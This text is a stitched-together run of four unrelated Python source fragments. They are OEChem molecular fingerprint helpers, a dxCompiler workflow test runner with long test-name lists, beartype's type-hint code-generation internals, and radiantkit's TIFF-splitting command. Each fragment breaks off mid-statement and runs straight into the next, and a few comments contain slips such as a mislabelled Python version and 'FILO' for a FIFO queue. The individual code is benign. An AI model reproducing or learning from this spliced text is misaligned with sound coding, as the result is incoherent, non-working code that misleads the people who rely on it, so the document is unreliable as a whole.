function which generate fingerprints # I use functions which return functions because it was a nice way to # hide the differences between the two fingerprinters. I also found # that I can save a bit of time by not creating a new fingerprint each # time. The measured speedup is about 2% for MACCS166 and 6% for path # fingerprints. # Just like the OEGraphMol, these fingerprints must not be reused or # stored. They are mutated EVERY TIME. They are NOT thread-safe. # If you need to use these in multiple threads, then make multiple # fingerprinters. # Believe it or not, reusing the preallocated fingerprint measurably # helps the performance. def get_path_fingerprinter(numbits, minbonds, maxbonds, atype, btype): # Extra level of error checking since I expect people will think # of this as part of the public API. if not (16 <= numbits <= 65536): raise ValueError("numbits must be between 16 and 65536 (inclusive)") if not (0 <= minbonds): raise ValueError("minbonds must be 0 or greater") if not (minbonds <= maxbonds): raise ValueError("maxbonds must not be smaller than minbonds") # XXX validate the atype and type values? # It's a simple mask against the | of all possible value, then test for 0. # However, I'm not sure what to report as the error message. fp = OEFingerPrint() fp.SetSize(numbits) data_location = int(fp.GetData()) num_bytes = (numbits+7)//8 def path_fingerprinter(mol): OEMakePathFP(fp, mol, numbits, minbonds, maxbonds, atype, btype) return ctypes.string_at(data_location, num_bytes) return path_fingerprinter def get_maccs_fingerprinter(): fp = OEFingerPrint() # Call SetSize() now to force space allocation, so I only need one GetData() fp.SetSize(166) data_location = int(fp.GetData()) num_bytes = (166+7)//8 def maccs_fingerprinter(mol): OEMakeMACCS166FP(fp, mol) return ctypes.string_at(data_location, num_bytes) return maccs_fingerprinter ### A note on fingerprints and ctypes.string_at # The FPS format and OEFingerPrint.GetData() values used identical bit # and byte order. Bytes are in little-endian order and bits are in # big-endian order. That means I can use GetData() to get the # underlying C storage area, use ctypes to turn that into a Python # string, which I then hex encode. # The other option is to use OEFingerPrint.ToHexString(). But that's # pure little endian, so I would need a transposition to make the bits # be what I want them to be. OEChem's hex strings also end with a flag # which says how many extra bits to trim, which I don't need since I # handle it a different way. # Here's some info about the bit order, which I tested by setting a # few bits though the API then seeing what changed in the hex string # and in the underlying GetData() field. # The bit pattern # 01234567 89ABCDEF pure little endian # 10011100 01000011 # # 93 2C using ToHexString() (pure little endian) # 0x39 c2 using hex(ord(GetData())) (litle endian byte, big endian bit) # # 76543210 FEDCBA98 # 00111001 11000010 little endian byte, big endian bit ################ Handle formats # Make format names to OEChem format types _formats = { "smi": OEFormat_SMI, "ism": OEFormat_ISM, "can": OEFormat_CAN, "sdf": OEFormat_SDF, "mol": OEFormat_SDF, "skc": OEFormat_SKC, "mol2": OEFormat_MOL2, "mmod": OEFormat_MMOD, "oeb": OEFormat_OEB, "bin": OEFormat_BIN, } # Some trickiness to verify that the format specification is # supported, but without doing anything (yet) to set those flags. # I return a function which will set the file stream parameters # correctly. def _do_nothing(ifs): pass # Format is something like ".sdf.gz" or "pdb" or "smi.gz" def _get_format_setter(format=None): if format is None: return _do_nothing fmt = format.lower() is_compressed = 0 if fmt.endswith(".gz"): is_compressed = 1 fmt = fmt[:-3] # Should be something like ".sdf" or "sdf" or "smi" format_flag = _formats.get(fmt, None) if format_flag is None: raise ValueError("Unsupported format %r" % (format,)) def set_format(ifs): ifs.SetFormat(format_flag) if is_compressed: ifs.Setgz(is_compressed) return set_format def _open_stdin(set_format, aromaticity_flavor): ifs = oemolistream() ifs.open() set_format(ifs) if aromaticity_flavor is not None: flavor = ifs.GetFlavor(ifs.GetFormat()) flavor |= aromaticity_flavor ifs.SetFlavor(ifs.GetFormat(), flavor) return ifs def _open_ifs(filename, set_format, aromaticity_flavor): ifs = oemolistream() if not ifs.open(filename): # Let Python try to do
#!/usr/bin/env python3 import argparse import shutil from collections import namedtuple import dxpy import glob import hashlib import json import os import random import re import sys import subprocess import tempfile from termcolor import cprint import time import traceback from typing import List import yaml from dxpy.exceptions import DXJobFailureError import util here = os.path.dirname(sys.argv[0]) top_dir = os.path.dirname(os.path.abspath(here)) test_dir = os.path.join(os.path.abspath(top_dir), "test") default_instance_type = "mem1_ssd1_v2_x4" git_revision = subprocess.check_output( ["git", "describe", "--always", "--dirty", "--tags"] ).strip() test_files = {} expected_failure = { "bad_status", "bad_status2", "just_fail_wf", "missing_output", "docker_retry", "argument_list_too_long", "diskspace_exhauster", "symlink-illegal", "docker-array-secondaryfiles.1", "iwd-container-entryname2", "iwd-container-entryname3", "iwd-container-entryname4", "loadContents-limit", "cond-wf-003.3", "cond-wf-004.1", "cond-wf-005", "cond-wf-006.1", "cond-wf-012", "cond-wf-003-1.1", "cond-wf-003-1_nojs.1", "cond-wf-004_nojs.1", "cond-wf-005_nojs", "cond-wf-006_nojs.1", "cond-wf-012_nojs", "fail-unconnected", } test_compilation_failing = {"import_passwd"} wdl_v1_list = [ # calling native dx applets/apps "call_native_v1", "call_native_app", "cast", "dict", "instance_types", "linear_no_expressions", "linear", "optionals", "optionals3", "spaces_in_file_paths", "strings", "runtime_vs_static_type", "wf_person", "call_level2", "environment_passing_deep_nesting", "optional_output", "unpassed_default_arg", # workflows with nested blocks "two_levels", "three_levels", "four_levels", "param_passing", "nested_scatter", # Array input with no values "empty_array", # Map with a File key "map_file_key", # defaults and parameter passing "top_wf", "subworkflow_with_default", # can we download from a container? "download_from_container", # input file with pairs "echo_pairs", "array_structs", # Missing optional output files, returned as none, instead # of an error "missing_optional_output_file", # calling with an optional argument not specified "scatter_subworkflow_with_optional", # streaming "streaming_inputs", # input/output linear_no_expressions "wf_with_input_expressions", "wf_with_output_expressions", # bug regression tests "nested_pairs", # APPS-370 "apps_378", "apps_384", "diff_stream_and_download", # APPS-288 "apps_573", "apps_612", "nested_optional", "struct_deref", # APPS-615 # manifests "simple_manifest", "complex_manifest", "view_and_count_manifest", # workflow with output files created by expressions "upload_workflow_files" ] wdl_v1_1_list = [ "v1_1_dict", "apps_847_scatter_empty", "optional_missing", "inputs_provided_optional", # bug regression tests "apps_579_boolean_flag_expr", "apps_579_string_substitution_expr" ] # docker image tests docker_test_list = [ "broad_genomics", "biocontainers", "private_registry", "native_docker_file_image", "native_docker_file_image_gzip", "samtools_count", "dynamic_docker_image", "ecr_docker", ] # wdl draft-2 draft2_test_list = [ "advanced", "bad_status", "bad_status2", "just_fail_wf", "call_with_defaults1", "call_with_defaults2", "conditionals_base", "files", "files_with_the_same_name", "hello", "shapes", # this test cannot be enabled yet, because we # don't yet support overriding task inputs # "population", # multiple library imports in one WDL workflow "multiple_imports", # subworkflows "conditionals2", "modulo", "movies", "subblocks2", "subblocks", "var_type_change", "outer", # calling native dx applets/apps # We currently do not have a code generator for draft-2, so cannot import dx_extern.wdl. # "call_native", "write_lines_bug", ] single_tasks_list = [ "add3", "diff2files", "empty_stdout", "sort_file", "symlinks_wc", "DiskSpace2", "echo_line_split", "opt_array", "stream_diff_v1", ] cwl_tools = [ "cat", # hello world tool "tar_files", ] cwl_conformance_tools = [ os.path.basename(path)[:-9] for path in glob.glob(os.path.join(test_dir, "cwl_conformance", "tools", "*.cwl.json")) ] cwl_conformance_workflows = [ os.path.basename(path)[:-9] for path in glob.glob(os.path.join(test_dir, "cwl_conformance", "workflows", "*.cwl.json")) ] # Tests run in continuous integration. We remove the native app test, # because we don't want to give permissions for creating platform apps. ci_test_list = [ # WDL tests "advanced", # We currently do not have a code generator for draft-2, so cannot import dx_extern.wdl. # "call_native", "call_with_defaults1", "trains", "files", # CWL tests "cat", ] special_flags_list = [ "add2", # test the ignoreReuse flag "add_many", # tests the delayWorkspaceDestruction flag "inc_range", # check that runtime call to job/analysis pass the delayWorkspaceDestruction flag ] # these are the examples from the documentation doc_tests_list = [ "bwa_mem" ] cromwell_key_error_list = [ "http_inputs", "drs_usa_hca", "drs_usa_jdr", ] # These are cromwell tests that won't run on DNAnexus - see README.txt cromwell_invalid = { "local_backend", "string_interpolation", "call_cache_hit_prefixes", "declarations", "reference_disk_test", "optional_parameter", "sub", "sub_sub", "echo", "sub_workflow_no_output", "recursive_imports", "large_final_workflow_outputs_dir", "input_from_bucket_with_requester_pays", "optional_declarations", "sub_workflow_interactions", "unscattered", "inter_scatter_dependencies", "docker_alpine", "read_write_functions", "afters_and_ifs", "afters", "afters_and_scatters", "custom_cacheworthy_attributes", "input_expressions", "missing_delete", "confirm_preemptible", "call_cache_capoeira_jes", "dedup_localizations_papi_v2", "papi_v2_log", "papi_v2_plain_detritus", "call_cache_capoeira_local", "backendWithNoDocker", "docker_image_cache_true", "dummy_scatter", "fofn_caching", "hello_private_repo", "local_bourne", "papi_v2_gcsa", "monitoring_log", "call_cache_capoeira_tes", "check_network_in_vpc", "tmp_dir", "long_cmd", "workbench_health_monitor_check", "monitoring_image_script", "docker_size_dockerhub", "docker_size_gcr", "custom_mount_point", "short_circuit", "top", "recursive_imports_no_subwf", "parallel_composite_uploads_on", "parallel_composite_uploads_off", "default_runtime_attributes", } # tests taken from cromwell repository cromwell_tests_list = [ "null_input_values", "dont_strip_line_prefix", "non_root_default_user", "memory_units", "cacheWithinWF", "dot_dir_stuck_running", "empty_string", "floating_tags", "array_literal_locations", "stdout_delete", "sub_workflow_delete", "no_output_delete", "exhaustive_delete", "scatter_delete", "collections_delete", "hello_delete", "sub_workflow_delete_import", "no_cache_delete", "gcs_path_ending_with_newline", "readFromCache", "sizerelativepath", "subworkflow", "b", "c", "a", "d", "sub_sub_sub", "array_io", "simple_if", "single_to_array_conversion", "coerce_to_array_of_optionals", "wdl_function_locations", "workflow_output_paths", "sub_function", "public_http_import", "control_chars", "prefix", "write_lines_files", "cached_copy", "read_tsv", "custom_entrypoint", "square", "papi_cpu_platform", "complex_types_files", "file_evaluator_identifier_lookups", "non_root_specified_user", "write_lines", "workflow_output_paths_colliding", "jes_labels", "localization_sanity_papi_v2", "recimp_nosubwf_outer", "recimp_nosubwf_inner", "globbingindex", "postfix_quantifiers", "length", "wdl_empty_glob", "output_filename_interpolation", "aliased_subworkflows", "docker_image_cache_false", "curl", "symlink_localization", "error_10_preemptible", "multiline_command_line", "use_cacheCopy_dir", "writeToCache", "cacheBetweenWF", "lots_of_inputs", "local_gcs", "read_write_json_roundtrip_develop", "read_write_json_roundtrip", "checkpointing", "cromwell_restart", "space", "arrays_scatters_ifs", "declarations_as_nodes", "variable_scoping", "sub_workflow_decls", "input_mirror", "sub_workflow_hello_world_import", "sub_workflow_hello_world", "volatile_disables_cache", "file_outputs_from_input", "write_tsv", "final_call_logs_dir", "subdirectory", "input_localization", "scattered", "filearrayoutput", "array_io", "docker_hash_quay", "docker_hash_gcr", "workflow_type_and_version_wdl", "dontglobinputs", "globbingscatter", "ifs_in_scatters", "nested_lookups", "simple_if", "declarations_in_ifs", "lots_of_nesting", "ifs_upstream_and_downstream", "subworkflows_in_ifs", "scatters_in_ifs", "simple_if_workflow_outputs", "scattergather", "map_workflow", "forkjoin", "scatter_chain", "output_redirection", "workflowenginefunctions", "stdout_stderr_passing", "scatter", "siblings_scatter", "simple_scatter", "prepare_scatter_gather", "multiplesourcedarray", "passingfiles", "referencingpreviousinputsandoutputs", "engine_functions", #"string_interpolation_optional", # pending wdlTools 170 #"none_literal", # pending wdlTools 170 "sub_workflow_interactions_scatter", "sub_workflow_one_output_import", "sub_workflow_var_refs", "sub_workflow_var_refs_import", #"globbingBehavior", # pending dxCompiler 87 #"object_access", # pending wdlTools 171 #"read_write_json", # pending wdlTools 171 "no_task_no_output_delete", "if_then_else_expressions", "sub_workflow_no_output_block_import", "sub_workflow_no_outputs_in_block_import", "sub_workflow_interactions_import", "workflow_output_declarations", "member_access", "select_functions", "dollars_in_strings", "workflow_name_length_ok", "importer_ok", "read_write_map", "docker_image_cache_unspecified", "subworkflow", "defined_function", "workflow_engine_functions", "empty_scatter", "continue_on_return_code", "exit", ] # these are tests that take a long time to run long_test_list = [ "diskspace_exhauster" # APPS-749 ] medium_test_list = ( wdl_v1_list + wdl_v1_1_list + docker_test_list + special_flags_list + cwl_tools ) large_test_list = ( medium_test_list + draft2_test_list + single_tasks_list + doc_tests_list + long_test_list + cwl_conformance_tools + cwl_conformance_workflows + cromwell_tests_list ) test_suites = { "CI": ci_test_list, "M": medium_test_list, "L": large_test_list, "tasks": single_tasks_list, "draft2": draft2_test_list, "docker": docker_test_list, "native": ["call_native", "call_native_v1"], "docs": doc_tests_list, "cwl_tools": cwl_conformance_tools, "cwl_workflows": cwl_conformance_workflows, 'cromwell': cromwell_tests_list, } # Tests with the reorg flags test_reorg = { "dict", "strings", "test_reorg", "test_reorg_no_config" } test_defaults = set() test_unlocked = { "array_structs", "cast", "call_with_defaults1", "files", "hello", "path_not_taken", "optionals", "shapes", "population" } test_project_wide_reuse = { "add2", "add_many" } test_separate_outputs = { "localization" } test_import_dirs = ["A"] TestMetaData = namedtuple("TestMetaData", ["name", "kind"]) TestDesc = namedtuple( "TestDesc", ["name", "kind", "source_file", "raw_input", "dx_input", "results", "extras"], ) # Test with -waitOnUpload flag test_upload_wait = { "upload_wait" } # use the applet's default instance type rather than the default (mem1_ssd1_x4) test_instance_type = ["diskspace_exhauster"] # Read a JSON file def read_json_file(path): with open(path, "r") as fd: data = fd.read() d = json.loads(data) return d def verify_json_file(path): try: read_json_file(path) except: raise RuntimeError("Error verifying JSON file {}".format(path)) # Search a WDL file with a python regular expression. # Note this is not 100% accurate. # # Look for all tasks and workflows. If there is exactly # one workflow, this is a WORKFLOW. If there are no # workflows and exactly one task, this is an APPLET. task_pattern_re = re.compile(r"^(task)(\s+)(\w+)(\s+){") wf_pattern_re = re.compile(r"^(workflow)(\s+)(\w+)(\s+){") def get_wdl_metadata(filename): workflows = [] tasks = [] with open(filename, "r") as fd: for line in fd: m = re.match(wf_pattern_re, line) if m is not None: workflows.append(m.group(3)) m = re.match(task_pattern_re, line) if m is not None: tasks.append(m.group(3)) if len(workflows) > 1: raise RuntimeError("WDL file {} has multiple workflows".format(filename)) if len(workflows) == 1: return TestMetaData(name=workflows[0], kind="workflow") assert len(workflows) == 0 if len(tasks) == 1: return TestMetaData(name=tasks[0], kind="applet") if os.path.basename(filename).startswith("library") or os.path.basename( filename ).endswith("_extern"): return raise RuntimeError( "{} is not a valid WDL test, #tasks={}".format(filename, len(tasks)) ) def get_cwl_metadata(filename, tname): with open(filename, "r") as fd: doc = yaml.safe_load(fd) if doc["class"] == "CommandLineTool": name = doc.get("id", tname) return TestMetaData(name=name, kind="applet") raise RuntimeError("{} is not a valid CWL tool test".format(filename)) def get_cwl_json_metadata(filename, tname): with open(filename, 'r') as fd: doc = json.load(fd) if "class" in doc: # the id in a packed CWL file is always "main" so we use the test name instead if doc["class"] == "Workflow": return TestMetaData(name=tname, kind="workflow") elif doc["class"] == "CommandLineTool": return TestMetaData(name=tname, kind="applet") elif "$graph" in doc: for proc in doc["$graph"]: if proc["id"] == "#main": if proc["class"] == "Workflow": return TestMetaData(name=tname, kind="workflow") else: break raise RuntimeError("{} is not a valid CWL workflow test".format(filename)) # Register a test name, find its inputs and expected results files. def register_test(dir_path, tname, ext): global test_files if tname in test_suites.keys(): raise RuntimeError( "Test name {} is already used by a test-suite, it is reserved".format(tname) ) source_file = os.path.join(dir_path, tname + ext) if not os.path.exists(source_file): raise RuntimeError("Test file {} does not exist".format(source_file)) if ext == ".wdl": metadata = get_wdl_metadata(source_file) elif ext == ".cwl": metadata = get_cwl_metadata(source_file, tname) elif ext == ".cwl.json": metadata = get_cwl_json_metadata(source_file, tname) else: raise RuntimeError("unsupported file type {}".format(ext)) desc = TestDesc( name=metadata.name, kind=metadata.kind, source_file=source_file, raw_input=[], dx_input=[], results=[], extras=None, ) # Verify the input file, and add it (if it exists) test_input = os.path.join(dir_path, tname + "_input.json") if os.path.exists(test_input): verify_json_file(test_input) desc.raw_input.append(test_input) desc.dx_input.append(os.path.join(dir_path, tname + "_input.dx.json")) desc.results.append(os.path.join(dir_path, tname + "_results.json")) # check if the alternate naming scheme is used for tests with multiple inputs i = 1 while True: test_input = os.path.join(dir_path, tname + "_input{}.json".format(i)) if os.path.exists(test_input): verify_json_file(test_input) desc.raw_input.append(test_input) desc.dx_input.append( os.path.join(dir_path, tname + "_input{}.dx.json".format(i)) ) desc.results.append( os.path.join(dir_path, tname + "_results{}.json".format(i)) ) i += 1 else: break # Add an extras file (if it exists) extras = os.path.join(dir_path, tname + "_extras.json") if os.path.exists(extras): desc = desc._replace(extras=extras) test_files[tname] = desc return desc ###################################################################### # Same as above, however, if a file
Since # the get_next_pep_hint_child_str() method increments *BEFORE* # stringifying this ID, initializing this ID to -1 ensures that method # returns a string containing only non-negative substrings starting at # 0 rather than both negative and positive substrings starting at -1. hint_child_placeholder_id = -1 #FIXME: Excise us up. # Python expression evaluating to the value of the currently iterated child # hint of the currently visited parent hint. # hint_child_expr = None #FIXME: Excise us up. # Origin type (i.e., non-"typing" superclass suitable for shallowly # type-checking the current pith against the currently visited hint by # passing both to the isinstance() builtin) of the currently iterated child # hint of the currently visited parent hint. # hint_child_type_origin = None #FIXME: Excise us up. # Python code snippet evaluating to the current (possibly nested) object of # the passed parameter or return value to be type-checked against the # currently iterated child hint. #pith_child_expr = None # Python code snippet expanding to the current level of indentation # appropriate for the currently iterated child hint, initialized to the # root hint indentation to enable the subsequently called # _enqueue_hint_child() function to enqueue the root hint. indent_child = indent_curr # ..................{ HINT ~ childs }.................. # Current tuple of all PEP-compliant child hints subscripting the currently # visited hint (e.g., "(int, str)" if "hint_curr == Union[int, str]"). hint_childs: tuple = None # type: ignore[assignment] # Number of PEP-compliant child hints subscripting the currently visited # hint. hint_childs_len: int = None # type: ignore[assignment] # Set of all PEP-noncompliant child hints subscripting the currently # visited hint. hint_childs_nonpep: set = None # type: ignore[assignment] # Set of all PEP-compliant child hints subscripting the currently visited # hint. hint_childs_pep: set = None # type: ignore[assignment] # ..................{ HINT ~ pep 484 : forwardref }.................. # Set of the unqualified classnames referred to by all relative forward # references visitable from this root hint if any *OR* "None" otherwise # (i.e., if no such forward references are visitable). hints_forwardref_class_basename: set = None # type: ignore[assignment] # Possibly unqualified classname referred to by the currently visited # forward reference type hint. hint_curr_forwardref_classname: str = None # type: ignore[assignment] # ..................{ HINT ~ pep 572 }.................. # The following local variables isolated to this subsection are only # relevant when these conditions hold: # # * The active Python interpreter targets at least Python 3.8, the first # major Python version to introduce support for "PEP 572 -- Assignment # Expressions." # * The currently visited hint is *NOT* the root hint (i.e., "hint_root"). # If the currently visited hint is the root hint, the current pith has # already been localized to a local variable whose name is the value of # the "VAR_NAME_PITH_ROOT" string global and thus need *NOT* be # relocalized to another local variable using an assignment expression. # # This is a necessary and sufficient condition for deciding whether a # Python >= 3.8-specific assignment expression localizing the current pith # should be embedded in the code generated to type-check this pith against # this hint. This is a non-trivial runtime optimization eliminating # repeated computations to obtain this pith from PEP-compliant child hints. # For example, if this hint constrains this pith to be a standard sequence, # the child pith of this parent pith is a random item selected from this # sequence; since obtaining this child pith is non-trivial, the computation # required to do so is performed only once by assigning this child pith to # a unique local variable during runtime type-checking and then repeatedly # type-checking that variable rather than the computation required to # continually reacquire this child pith: e.g., # # # Type-checking conditional for "List[List[str]]" under Python < 3.8. # if not ( # isinstance(__beartype_pith_0, list) and # ( # isinstance(__beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)], list) and # isinstance(__beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)][__beartype_random_int % len(__beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)])], str) if __beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)] else True # ) if __beartype_pith_0 else True # ): # # # The same conditional under Python < 3.8. # if not ( # isinstance(__beartype_pith_0, list) and # ( # isinstance(__beartype_pith_1 := __beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)], list) and # isinstance(__beartype_pith_1[__beartype_random_int % len(__beartype_pith_1)], str) if __beartype_pith_1 else True # ) if __beartype_pith_0 else True # ): # # Note the localization of the random item selection from the root pith # (i.e., "__beartype_pith_1 := __beartype_pith_0[__beartype_random_int % # len(__beartype_pith_0)"), which only occurs once in the latter case # rather than repeatedly as in the former case. In both cases, the same # semantic type-checking is performed regardless of optimization. # # Note this optimization implicitly "bottoms out" when the currently # visited hint is *NOT* subscripted by one or more non-ignorable # PEP-compliant child hint arguments, as desired. If all child hints of the # currently visited hint are either ignorable (e.g., "object", "Any") *OR* # are non-ignorable non-"typing" types (e.g., "int", "str"), the currently # visited hint has *NO* meaningful PEP-compliant child hints and is thus # effectively a leaf node with respect to performing this optimization. # is_pith_curr_assign_expr = None # Integer suffixing the name of each local variable assigned the value of # the current pith in a Python >= 3.8-specific assignment expression, thus # uniquifying this variable in the body of the current wrapper function. # # Note that this integer is intentionally incremented as an efficient # low-level scalar rather than an inefficient high-level # "itertools.counter" object. Since both are equally thread-safe in the # internal context of this function body, the former is preferable. pith_curr_assign_expr_name_counter = 0 # Python >= 3.8-specific assignment expression assigning this full Python # expression to the local variable assigned the value of this expression. pith_curr_assign_expr: str = None # type: ignore[assignment] # Name of the local variable uniquely assigned to by # "pith_curr_assign_expr". Equivalently, this is the left-hand side (LHS) # of that assignment expression. pith_curr_assigned_expr: str = None # type: ignore[assignment] # ..................{ HINT ~ label }.................. # Human-readable label prefixing the machine-readable representation of the # currently visited type hint if this hint is nested (i.e., any hint # *except* the root type hint) in exception and warning messages. # # Note that "hint_curr_label" should almost *ALWAYS* be used instead. HINT_CHILD_LABEL = f'{_HINT_ROOT_LABEL} {repr(hint_root)} child' # Human-readable label prefixing the machine-readable representation of the # currently visited type hint in exception and warning messages. hint_curr_label: str = None # type: ignore[assignment] # ..................{ METADATA }.................. # Tuple of metadata describing the currently visited hint, appended by # the previously visited parent hint to the "hints_meta" stack. hint_curr_meta: tuple = None # type: ignore[assignment] # Fixed list of all metadata describing all visitable hints currently # discovered by the breadth-first search (BFS) below. This list acts as a # standard First In First Out (FILO) queue, enabling this BFS to be # implemented as an efficient imperative algorithm rather than an # inefficient (and dangerous, due to both unavoidable stack exhaustion and # avoidable infinite recursion) recursive algorithm. # # Note that this list is guaranteed by the previously called # _die_if_hint_repr_exceeds_child_limit() function to be larger than the # number of hints transitively visitable from this root hint. Ergo, *ALL* # indexation into this list performed by this BFS is guaranteed to be safe. # Ergo, avoid explicitly testing below that the "hints_meta_index_last" # integer maintained by this BFS is strictly less than "SIZE_BIG", as this # constraint is already guaranteed to be the case. hints_meta = acquire_fixed_list(SIZE_BIG) # 0-based index of metadata describing the currently visited hint in the # "hints_meta" list. hints_meta_index_curr = 0 # 0-based index of metadata describing the last visitable hint in the # "hints_meta" list, initialized to "-1"
<reponame>ggirelli/radiantkit """ @author: <NAME> @contact: <EMAIL> """ import argparse import configparser as cp import logging import numpy as np # type: ignore import os import radiantkit as ra from radiantkit import argtools as ap from radiantkit import image as imt from rich.progress import track # type: ignore from rich.prompt import Confirm # type: ignore import sys from typing import Iterable, Iterator, List, Tuple def init_parser(subparsers: argparse._SubParsersAction) -> argparse.ArgumentParser: parser = subparsers.add_parser( __name__.split(".")[-1], description=""" Split a TIFF image in smaller TIFF images of the specified side(s). If two different sides are provided, the smaller images will be rectangular. The first side corresponds to the X (columns) and the second to the Y (rows). By default, only one side is required, which is used by the script for both X and Y sides. In other words, square smaller images are produced. If the original dimensions are not multiples of the specified side, a portion of the image is lost, unless the --enlarge option is used. In that case, the smaller images generated from the image border will contain empty pixels. If the input image is a 3D stack, it will be split only on XY and the output images will have the same number of slices. Using the --slice option, it is possible to specify which slice to split (i.e., the output will be in 2D). Defaults to first slice (--slice 0). It is also possible to generate overlapping split images. This can be achieved by using either the -S or -O options (which cannot be used together). With the -S option, you can specify the step used when splitting the image, as a fraction of its sides or as an absolute number of pixels. With the -O option, you can specify the overlapping region between consecutive split images as a fraction of their sides or as absolute pixels. In other words, the options -S 0.9 and -O 0.1 yield the same result. It is possible to provide two values to -S and -O, to obtain different overlaps in X and Y. By default, split images are generated left-to-right, top-to-bottom, e.g., 1 2 3 4 5 6 7 8 9 Use the option -I to generate them top-to-bottom, left-to-right, e.g., 1 4 7 2 5 8 3 6 9 Examples: - Square images of 100x100 px tiff_split big_image.tif split_out_dir 100 -e - Rectangular images of 125x100 px tiff_split big_image.tif split_out_dir 100 125 -e - Square images of 100x100 px, overlapping for 10 px in X and Y tiff_split big_image.tif split_out_dir 100 -e -S 0.9 tiff_split big_image.tif split_out_dir 100 -e -S 90 tiff_split big_image.tif split_out_dir 100 -e -O 0.1 tiff_split big_image.tif split_out_dir 100 -e -O 10 - Square images of 100x100 px, overlapping for 10 px in X and 20 px in Y tiff_split big_image.tif split_out_dir 100 -e -S 0.9 0.8 tiff_split big_image.tif split_out_dir 100 -e -S 90 80 tiff_split big_image.tif split_out_dir 100 -e -O 0.1 0.2 tiff_split big_image.tif split_out_dir 100 -e -O 10 20""", formatter_class=argparse.RawDescriptionHelpFormatter, help="Split a TIFF image in smaller images of the specified side(s).", ) parser.add_argument("input", type=str, help="""Path to the TIFF image to split.""") parser.add_argument( "outdir", type=str, help="""Path to output TIFF folder, created if missing.""" ) parser.add_argument( "side", type=int, nargs="+", help="""One or two (XY) sides, used to specify the smaller images dimensions.""", ) parser.add_argument( "--step", metavar="NUMBER", type=float, nargs="+", help="""Step for splitting, defined as a fraction of the specified side(s).""", ) parser.add_argument( "--overlap", metavar="NUMBER", type=float, help="""Overlap fraction of splitted images, defined as a fraction of the specified side(s).""", nargs="+", ) parser.add_argument( "--slice", metavar="NUMBER", type=int, help="""ID of slice to be extracted from Z-stacks, 1-indexed.""", ) parser.add_argument( "--enlarge", action="store_const", dest="enlarge", const=True, default=False, help="Expand to avoid pixel loss.", ) advanced = parser.add_argument_group("advanced arguments") advanced.add_argument( "--invert", action="store_const", dest="inverted", const=True, default=False, help="""Split top-to-bottom, left-to-right.""", ) advanced.add_argument( "-y", "--do-all", action="store_const", help="""Do not ask for settings confirmation and proceed.""", const=True, default=False, ) parser = ap.add_version_argument(parser) parser.set_defaults(parse=parse_arguments, run=run) return parser def update_args_from_step( args: argparse.Namespace, relative_steps: bool ) -> Tuple[argparse.Namespace, bool]: assert all([step > 0 for step in args.step]) step_is_relative = all([step <= 1 for step in args.step]) step_is_absolute = all([step > 1 for step in args.step]) assert step_is_absolute or step_is_relative while len(args.step) < len(args.side): args.step.append(args.step[0]) args.step = args.step[: len(args.side)] if step_is_absolute: relative_steps = False args.overlap = np.array( [args.side[i] - args.step[i] for i in range(len(args.step))] ).astype("int") elif step_is_relative: args.overlap = [np.round(1 - s, 3) for s in args.step] return args, relative_steps def update_args_from_overlap( args: argparse.Namespace, relative_steps: bool ) -> Tuple[argparse.Namespace, bool]: assert all([overlap >= 0 for overlap in args.overlap]) overlap_is_relative = all([overlap < 1 for overlap in args.overlap]) overlap_is_absolute = all([overlap > 1 for overlap in args.overlap]) assert overlap_is_absolute or overlap_is_relative while len(args.overlap) < len(args.side): args.overlap.append(args.overlap[0]) args.overlap = args.overlap[: len(args.side)] if overlap_is_absolute: relative_steps = False args.step = np.array( [args.side[i] - args.overlap[i] for i in range(len(args.overlap))] ).astype("int") elif overlap_is_relative: args.overlap = [np.round(1 - s, 3) for s in args.overlap] return args, relative_steps def check_step_and_overlap(args: argparse.Namespace) -> argparse.Namespace: relative_steps = True if args.step is not None: args, relative_steps = update_args_from_step(args, relative_steps) if args.overlap is not None: args, relative_steps = update_args_from_overlap(args, relative_steps) if (args.overlap is not None or args.step is not None) and relative_steps: args.step = np.array( [np.round(args.side[i] * args.step[i]) for i in range(len(args.step))] ).astype("int") args.overlap = np.array( [np.round(args.side[i] * args.overlap[i]) for i in range(len(args.overlap))] ).astype("int") return args def parse_arguments(args: argparse.Namespace) -> argparse.Namespace: args.version = ra.__version__ assert os.path.isfile(args.input), "input file not found: %s" % args.input assert not os.path.isfile( args.outdir ), f"output directory cannot be a file: {args.outdir}" if 1 == len(args.side): args.side = (args.side[0], args.side[0]) else: args.side = args.side[:2] if args.slice is not None: assert args.slice > 0 assert not ( args.step is not None and args.overlap is not None ), "-S and -O are incompatible" args = check_step_and_overlap(args) if not os.path.isdir(args.outdir): os.mkdir(args.outdir) return args def enlarge_XY_tiff(img: np.ndarray, offset: List[int]) -> np.ndarray: new_shape = list(img.shape) new_shape[-1] += int(offset[0]) new_shape[-2] += int(offset[1]) new_image = img.copy() new_image = np.zeros(new_shape) new_image[np.ix_(*[range(img.shape[i]) for i in range(len(img.shape))])] = img return new_image def get_pixel_loss( img: np.ndarray, side: List[int], step: List[float] ) -> Tuple[int, int, int, float]: N = len(img.shape) assert len(side) <= N if step is None: missed = [int(img.shape[-i - 1] % side[i]) for i in range(len(side))] else: assert len(side) == len(step) missed = [int(img.shape[-i - 1] % side[i] % step[i]) for i in range(len(side))] lost_parts = [] for i in range(len(side)): otherd = [img.shape[j] for j in range(N) if not N - i - 1 == j] otherd.append(missed[-i - 1]) lost_parts.append(np.prod(otherd)) loss = int(np.sum(lost_parts) - np.prod(img.shape[:-2]) * np.prod(missed)) return (missed[0], missed[1], loss, float(loss / np.prod(img.shape) * 100)) def init_xy( img: np.ndarray, step: List[int], side: List[int], inverted: bool = False ) -> Iterable[Tuple[int, int]]: ys = [y for y in range(0, img.shape[-2], step[1]) if y + side[1] <= img.shape[-2]] xs = [x for x in range(0, img.shape[-1], step[0]) if x + side[0] <= img.shape[-1]] if inverted: logging.info("Image split top-to-bottom, left-to-right.") xy_gen = ((x, y) for x in xs for y in ys) else: logging.info("Image split left-to-right, top-to-bottom.") xy_gen = ((x, y) for y in ys for x in xs) return xy_gen def tsplit3d(img: np.ndarray, x: int, y: int, s: List[int]) -> np.ndarray: return img[:, slice(y, (y + s[1])), slice(x, (x + s[0]))] def tsplit2d(img: np.ndarray, x: int, y: int, s: List[int]) -> np.ndarray: return img[slice(y, (y + s[1])), slice(x, (x + s[0]))] tsplit_fun = {2: tsplit2d, 3: tsplit3d} def tiff_split( img: np.ndarray, side: List[int], step: List[int], inverted: bool = False ) 